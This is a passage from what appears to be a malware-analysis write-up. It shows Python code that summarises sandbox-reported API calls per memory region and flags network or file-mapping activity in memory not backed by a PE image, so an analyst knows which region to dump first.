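        for call in e["apis"]:
            r["apis"].add(call["api"])
            r["modules"].add(call["module"])
            r["call_sites"].add(call["ref"])
    out = {}
    for offset, r in regions.items():
        flags = []
        if not r["pe_backed"] and r["apis"] & NETWORK_APIS:
            flags.append("network code in memory not backed by a PE image")
        if r["apis"] & MAPPING_APIS:
            flags.append("shared-memory (file mapping) access")
        out[offset] = {"pe_backed": r["pe_backed"], "apis": sorted(r["apis"]),
                       "modules": sorted(r["modules"]),
                       "call_sites": len(r["call_sites"]), "flags": flags}
    return out


if __name__ == "__main__":
    for offset, info in summarize(parse_entries(SAMPLE)).items():
        print(offset, info)
```

Run against the full "Executed Functions" text of a report, the output is one line per dump region; a region flagged for both network and file-mapping calls while not being PE-backed is the one worth dumping and carving first.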

                                                  Non-executed Functions